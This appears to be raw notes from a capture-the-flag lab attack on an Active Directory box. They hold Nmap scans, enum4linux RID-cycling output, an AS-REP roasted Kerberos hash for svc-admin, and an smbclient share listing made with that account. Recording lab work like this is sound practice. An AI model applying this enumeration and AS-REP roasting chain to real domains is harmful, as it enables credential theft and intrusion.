# Nmap 7.95 scan initiated Sat Oct 4 06:07:39 2025 as: /usr/lib/nmap/nmap -Pn -A -T4 -oN An.txt 10.201.13.241Nmap scan report for 10.201.13.241Host is up (0.30s latency).Not shown: 986 closed tcp ports (reset)PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus80/tcp open http Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0|_http-title: IIS Windows Server| http-methods:|_ Potentially risky methods: TRACE88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-04 00:08:12Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)3269/tcp open tcpwrapped3389/tcp open ms-wbt-server Microsoft Terminal Services|_ssl-date: 2025-10-04T00:08:57+00:00; +3s from scanner time.| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local| Not valid before: 2025-10-02T23:40:33|_Not valid after: 2026-04-03T23:40:33| rdp-ntlm-info:| Target_Name: THM-AD| NetBIOS_Domain_Name: THM-AD| NetBIOS_Computer_Name: ATTACKTIVEDIREC| DNS_Domain_Name: spookysec.local| DNS_Computer_Name: AttacktiveDirectory.spookysec.local| Product_Version: 10.0.17763|_ System_Time: 2025-10-04T00:08:47+00:005985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not FoundNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.95%E=4%D=10/4%OT=53%CT=1%CU=38330%PV=Y%DS=4%DC=T%G=Y%TM=68E0659OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=106%TI=I%CI=I%II=I%SS=S%TS=OS:U)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=107%GCD=1%ISROS:=10B%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=108%GCD=1%ISR=10A%TI=I%CI=I%II=I%SSOS:=S%TS=U)SEQ(SP=109%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M509NW8OS:NNS%O2=M509NW8NNS%O3=M509NW8%O4=M509NW8NNS%O5=M509NW8NNS%O6=M509NNS)WIN(OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFFOS:%O=M509NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=YOS:%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%ROS:D=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(OS:R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)Network Distance: 4 hopsService Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:| smb2-security-mode:| 3:1:1:|_ Message signing enabled and required| smb2-time:| date: 2025-10-04T00:08:49|_ start_date: N/A|_clock-skew: mean: 2s, deviation: 0s, median: 1sTRACEROUTE (using port 1025/tcp)HOP RTT ADDRESS1 245.03 ms 10.14.0.12 ... 34 344.56 ms 10.201.13.241OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Sat Oct 4 06:09:03 2025 -- 1 IP address (1 host up) scanned in 84.32 seconds
# Nmap 7.95 scan initiated Sat Oct 4 06:08:40 2025 as: /usr/lib/nmap/nmap -Pn -A -T4 -p- -oN Aa.txt 10.201.13.241Nmap scan report for 10.201.13.241Host is up (0.31s latency).Not shown: 65508 closed tcp ports (reset)PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus80/tcp open http Microsoft IIS httpd 10.0|_http-title: IIS Windows Server|_http-server-header: Microsoft-IIS/10.0| http-methods:|_ Potentially risky methods: TRACE88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-04 00:25:02Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)3269/tcp open tcpwrapped3389/tcp open ms-wbt-server Microsoft Terminal Services| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local| Not valid before: 2025-10-02T23:40:33|_Not valid after: 2026-04-03T23:40:33|_ssl-date: 2025-10-04T00:26:23+00:00; +2s from scanner time.| rdp-ntlm-info:| Target_Name: THM-AD| NetBIOS_Domain_Name: THM-AD| NetBIOS_Computer_Name: ATTACKTIVEDIREC| DNS_Domain_Name: spookysec.local| DNS_Computer_Name: AttacktiveDirectory.spookysec.local| Product_Version: 10.0.17763|_ System_Time: 2025-10-04T00:26:15+00:005985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found|_http-server-header: Microsoft-HTTPAPI/2.09389/tcp open mc-nmf .NET Message Framing47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found|_http-server-header: Microsoft-HTTPAPI/2.049664/tcp open msrpc Microsoft Windows RPC49665/tcp open msrpc Microsoft Windows RPC49666/tcp open msrpc Microsoft Windows RPC49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.049670/tcp open msrpc Microsoft Windows RPC49671/tcp open msrpc Microsoft Windows RPC49672/tcp open msrpc Microsoft Windows RPC49674/tcp open msrpc Microsoft Windows RPC49689/tcp open msrpc Microsoft Windows RPC49698/tcp open msrpc Microsoft Windows RPC49821/tcp open msrpc Microsoft Windows RPCNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.95%E=4%D=10/4%OT=53%CT=1%CU=41281%PV=Y%DS=4%DC=T%G=Y%TM=68E069BOS:6%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=OS:U)SEQ(SP=104%GCD=1%ISR=10C%TI=I%CI=RD%II=I%SS=S%TS=U)SEQ(SP=10A%GCD=2%ISOS:R=10D%TI=I%CI=I%II=I%SS=O%TS=U)SEQ(SP=FC%GCD=1%ISR=108%TI=I%CI=I%II=I%SSOS:=O%TS=U)SEQ(SP=FF%GCD=1%ISR=101%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M509NW8NOS:NS%O2=M509NW8NNS%O3=M509NW8%O4=M509NW8NNS%O5=M509NW8NNS%O6=M509NNS)WIN(WOS:1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%OS:O=M509NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%OS:T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RDOS:=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%SOS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(ROS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%OS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)Network Distance: 4 hopsService Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:| smb2-security-mode:| 3:1:1:|_ Message signing enabled and required| smb2-time:| date: 2025-10-04T00:26:18|_ start_date: N/A|_clock-skew: mean: 2s, deviation: 0s, median: 1sTRACEROUTE (using port 8888/tcp)HOP RTT ADDRESS1 194.31 ms 10.14.0.12 ... 34 289.20 ms 10.201.13.241OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Sat Oct 4 06:26:30 2025 -- 1 IP address (1 host up) scanned in 1070.01 seconds
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 4 06:14:58 2025[34m =========================================( [0m[32mTarget Information[0m[34m )=========================================[0mTarget ........... 10.201.13.241RID Range ........ 500-550,1000-1050Username ......... ''Password ......... ''Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none[34m ===========================( [0m[32mEnumerating Workgroup/Domain on 10.201.13.241[0m[34m )===========================[0m[33m[E] [0m[31mCan't find workgroup/domain[0m[34m ===============================( [0m[32mNbtstat Information for 10.201.13.241[0m[34m )===============================[0mLooking up status of 10.201.13.241No reply from 10.201.13.241[34m ===================================( [0m[32mSession Check on 10.201.13.241[0m[34m )===================================[0m[33m[+] [0m[32mServer 10.201.13.241 allows sessions using username '', password ''[0m[34m ================================( [0m[32mGetting domain SID for 10.201.13.241[0m[34m )================================[0mDomain Name: THM-ADDomain Sid: S-1-5-21-3591857110-2884097990-301047963[33m[+] [0m[32mHost is part of a domain (not a workgroup)[0m[34m ==================================( [0m[32mOS information on 10.201.13.241[0m[34m )==================================[0m[33m[E] [0m[31mCan't get OS info with smbclient[0m[33m[+] [0m[32mGot OS info for 10.201.13.241 from srvinfo: [0mdo_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED[34m =======================================( [0m[32mUsers on 10.201.13.241[0m[34m )=======================================[0m[33m[E] [0m[31mCouldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED[0m[33m[E] [0m[31mCouldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED[0m[34m =================================( [0m[32mShare Enumeration on 10.201.13.241[0m[34m )=================================[0mdo_connect: Connection to 10.201.13.241 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Sharename Type Comment --------- ---- -------Reconnecting with SMB1 for workgroup listing.Unable to connect with SMB1 -- no workgroup available[33m[+] [0m[32mAttempting to map shares on 10.201.13.241[0m[34m ===========================( [0m[32mPassword Policy Information for 10.201.13.241[0m[34m )===========================[0m[33m[E] [0m[31mUnexpected error from polenum:[0m[+] Attaching to 10.201.13.241 using a NULL share[+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:10.201.13.241)[+] Trying protocol 445/SMB... [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.[33m[E] [0m[31mFailed to get password policy with rpcclient[0m[34m ======================================( [0m[32mGroups on 10.201.13.241[0m[34m )======================================[0m[33m[+] [0m[32mGetting builtin groups:[0m[33m[+] [0m[32m Getting builtin group memberships:[0m[33m[+] [0m[32m Getting local groups:[0m[33m[+] [0m[32m Getting local group memberships:[0m[33m[+] [0m[32m Getting domain groups:[0m[33m[+] [0m[32m Getting domain group memberships:[0m[34m ==================( [0m[32mUsers on 10.201.13.241 via RID cycling (RIDS: 500-550,1000-1050)[0m[34m )==================[0m[33m[I] [0m[36mFound new SID: [0mS-1-5-21-3591857110-2884097990-301047963[33m[I] [0m[36mFound new SID: [0mS-1-5-21-3591857110-2884097990-301047963[33m[+] [0m[32mEnumerating users using SID S-1-5-21-3591857110-2884097990-301047963 and logon username '', password ''[0mS-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)[33m[+] [0m[32mEnumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''[0mS-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)[34m ===============================( [0m[32mGetting printer info for 10.201.13.241[0m[34m )===============================[0mdo_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIEDenum4linux complete on Sat Oct 4 06:29:48 2025
[*] Getting TGT for svc-admin/root/.local/bin/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). now = datetime.datetime.utcnow() + datetime.timedelta(days=1)$krb5asrep$23$svc-admin@THM-AD:a984050052216c36aa57fa7467dcc35f$13ab86d922026a6a022a83576b1be01ff61225e116824f3d3eeb9bfc641cd23678180f882fc752a7c60f10282034c5ea1c3f4888fcd88b0048ec8610c3f51b6b57787d0a149c18a6e6b8463b5774f82a499e37830d9dfc4906dae0796e97c04f38796627922f31a8db7a3c0add822c7f12df792c638765ef4ae803a784b2c56d4461f6fc230300c43d3c3fe349896e84d87e56ed98969d7261e57697e5e3862b3a89d7fd9c0ce0093d18122873c639694152ccfac4ba0d966c97416e119946e965c6770988b40f3bbaf46c1d46770fe4488614c57d5c47b70f5783474cc0ff24d0b61cec0b3fa7bd75
the hash is in the Kerberos 5, etype 23, AS-REP format
╭─[~/projects/attacktiveDirectory]─[root@DEMONDAYZ]─[1]─[5616]╰─[:(] # smbclient -L //10.201.116.243 -U 'svc-admin'Password for [WORKGROUP\svc-admin]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backup Disk C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share